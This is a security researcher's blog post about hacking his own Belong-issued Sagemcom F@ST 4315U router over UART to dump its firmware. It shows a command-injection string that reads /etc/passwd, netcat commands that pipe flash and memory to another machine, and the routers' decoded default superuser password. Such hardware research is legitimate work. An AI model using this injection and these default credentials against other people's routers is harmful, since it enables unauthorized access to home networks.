Dumping firmware on the F@ST 4315U

Published on June 27th, 2016
by Dylanger Daly

 

I’ve had one of these modem/routers laying around for a long time as it came with my ISP (Belong over here in Australia) and I was upset at the very limited access it gave you, here’s a screenshot of the WebUI panel:

Screenshot from 2016-07-01 13-21-03

As you can see the options on the side there are very limited, so, without further adieu, lets get UART on the device and have a look.

Note: This device ONLY has the web GUI port open, no SSH or Telnet access is provided.

Getting UART on the board

One of the first steps I took was getting UART on the device, as you can see pictured below, the UART headers were already soldered on to the board.

13579973_10208457988799162_522981138_o

After wiring up UART port it should look something like this:

13575492_10208457990719210_1688946736_o

Playing around in the terminal

Logging in as ‘admin’ with default password ‘Belong’ gets us into a limited shell:

Screenshot from 2016-07-01 12-17-46

This is where things become interesting, we’re going to use ‘Command Injection’ to have the router execute arbitrary commands.

The process of doing so is quite easy, one simply appends an ampersand to the entered allow command for example: ping 8.8.8.8 & cat /etc/passwd  would execute the 2nd part of the command if the limited shell doesn’t sanitize user input, the following command would be run via /bin/sh so the result is bash sees the ampersand and executes our command like below:

 

Screenshot from 2016-07-01 12-18-34

As you can see, our command cat /etc/passwd was successfully executed and the console returned our users and their hashes.

Dumping flash

Okay, so we have the hashes, great, but I wanna have a look at the squahfs file system, luckily this system has a limited version of netcat!

To start, start listening on a PC within your lan with nc -l -p 8000 > belongFlashDump.bin next execute the following command on the router

Screenshot from 2016-07-01 12-23-42

This bad boy is going to cat the contents of /dev/mtd0 (flash) and pipe the contence to netcat, this command can also be used to dump the memory
of the router with ping & cat /dev/mem | nc 192.168.20.106 8000

Extracting the SquashFS Filesystem

Okay, lets have a look at the file we just dumped
Screenshot from 2016-07-01 12-22-50

Using unsquahfs we were able to successfully extract the fileystem, here’s the directory listing for the etc folder

Screenshot from 2016-07-01 13-10-12

One file stuck out as interesting to me, default.cfg, this file contained all of the Belong/Telstra changes to the modem as well as… Default passwords!

One part of that file specifically calls out to me:

<X_BROADCOM_COM_LoginCfg>
<AdminUserName>superuser</AdminUserName>
<AdminPassword>QmVsb25nAA==</AdminPassword>
<SupportUserName>support</SupportUserName>
<SupportPassword>QmVsb25nAA==</SupportPassword>
<UserUserName>admin</UserUserName>
<UserPassword>QmVsb25nAA==</UserPassword>
</X_BROADCOM_COM_LoginCfg>

This file stores the default passwords in base64, simply echoing the password into base64 –decode give us the following:

Screenshot from 2016-07-01 13-15-58

So, whats the superuser’s password?

Wait for it. The default password for superuser is… ‘Belong‘. Crazy right?

Accessing the console as Superuser

You can log into the device as ‘superuser’ via the console over UART, you receive many more options:

Login: superuser
Password:
>
>
> ?
?
help
logout
exit
quit
reboot
adsl
xdslctl
xtm
brctl
cat
virtualserver
ddns
dm
df
loglevel
logdest
dumpcfg
dumpmdm
dumpeid
mdm
meminfo
kill
dumpsysinfo
exitOnIdle
dnsproxy
syslog
echo
ifconfig
ping
ps
pwd
sntp
sysinfo
tftp
wlctl
arp
defaultgateway
dhcpserver
dns
lan
lanhosts
passwd
ppp
restoredefault
route
save
swversion
uptime
cfgupdate
swupdate
wan
mcpctl

Awesome! Superuser access, time to log into that WebUI

Not quite, logging into the WebUI results in the connection being killed and this being written to the console:

Screenshot from 2016-07-01 12-34-07

In the next post, I will reverse engineer the httpd daemon to try and find out why we can’t login with superuser as looking at the amount of config HTML files there are… This will be interesting

╭─ddaly@bird-of-prey ~/BelongTake2/squashfs-root
╰─$ ls webs-EN
accesscntr.html hlppppoeconn.html quicksetuperr.html
adslcfgc.html hlppppoeip.html quicksetup.html
adslcfg.html hlptstdns.html quicksetuptesterr.html
algcfg.html hlpusbconn.html quicksetuptestsucc.html
atmdelerr.html hlpwlconn.html rebootinfo.html
backupsettings.html homeplug.html resetrouter.html
backuptextsettings.html homeplugpassword.html restoreinfo.html
Belong_PBT_logos.jpg ifcdns.html ResultSave.html
berrun.html ifcgateway.html routeadd.html
berstart.html index.html rtdefaultcfgerr.html
berstop.html info.html rtdefaultcfg.html
bmu.html ipoacfg.html scdmz.html
bn1.gif ippcfg.html scinflt.html
bn2.gif ipsconfig.html scmacflt.html
board.gif ipsec.html scmacpolicy.html
certadd.html ipv6lancfg.html scoutflt.html
certcaimport.html lancfg2.html scprttrg.html
certimport.html lang_setting.html scvrtsrv.html
certloadsigned.html lanvlancfg.html seclogintro.html
cfgatm.html ledallgreenoff.html seltcfgc.html
cfgepon.html ledallgreenon.html seltcfg.html
cfgeth.html l_gray.gif snmpconfig.html
cfggpon.html l_green.gif sntpcfg.html
cfgl2tpac.html lockerror.html speedsvc.html
cfgmoca.html logconfig.html standby.html
cfgptm.html login_error.html StaticIpAdd.html
cfgwlwan.html logintro.html StaticIpErr.html
charerror.html logobkg.gif statsadslerr.html
colors.css logoc.gif statsadsl.html
ddnsadd.html logo_corp.gif statsadslreset.html
defaultsettings.html logo.html statsatmerr.html
d_gray.gif logomenu.gif statsatm.html
d_green.gif logo_sagemcom_en_1.gif statsatmreset.html
dhcpinfo.html l_red.gif statsifc.html
diag8021ag.html l_yellow.gif statsifcreset.html
diagbr.html main.html statsmocalanreset.html
diagethoam.html menuBcm.js statsmocareset.html
diag.html menudown.html statsmocawanreset.html
diagipow.html menufake.html statsopticifc.html
diaglan.html menu.html statsopticifcreset.html
diagmer.html menuTitle.js statsvdslreset.html
diagpppoa.html menuTree.js statswanreset.html
diagpppoe.html mocacfg.html statsxtmreset.html
dlnacfg.html modeminfo.html storageusraccadd.html
dnscfg.html multicast.html stylemain.css
dnsproxycfg.html natcfg2.html todadd.html
d_red.gif netinfcfg.html tr69cfg.html
dsladderr.html netpercfg.html tunnel4in6.html
dslbondingcfg.html ntwksum2.html tunnel6in4.html
d_yellow.gif omcidownload.html twonkycfg.html
enblbridge.html omcisystem.html updatesettings.html
enblservice.html panel2.gif upload.html
engdebug.html panel.gif uploadinfo.html
eponadderr.html panel_transparent.gif upnpcfg.html
epondelerr.html password.html url_add.html
ethadderr.html *.png util.js
ethdelerr.html portmapadd.html wanadderr.html
footer.html portmapedit.html wancfg.html
gponadderr.html portName.js wifiwanadderr.html
gpondelerr.html pppoe.html wifiwandelerr.html
gponpword.html pradd.html wlcfgadv.html
gre.html ptmadderr.html wlcfg.html
hlpadslsync.html ptmdelerr.html wlcfgkey.html
hlpatmetoe.html pwrmngt.html wlmacflt.html
hlpatmseg.html qoscls.html wlrefresh.html
hlpethconn.html qospoliceradd.html wlsecurity.html
hlppngdns.html qosportshaping.html wlsetup.html
hlppnggw.html qosqmgmt.html wlwapias.html
hlppppoasess.html qosqueueadd.html xdslcfg.html
hlppppoeauth.html qsmain.html

Can I snag a copy of a zipped filesystem?

Sure! Let me first just make sure I can as there may be some legal issues with doing so.

Dylanger Daly

If its Security, I'm there. I mainly work in the Security Research Field, most of my focus is Mobile Security, anything from the hardware to TrustZone to the Modem. Bypassing checks one NOP at a time.

You've reached the end!

back to top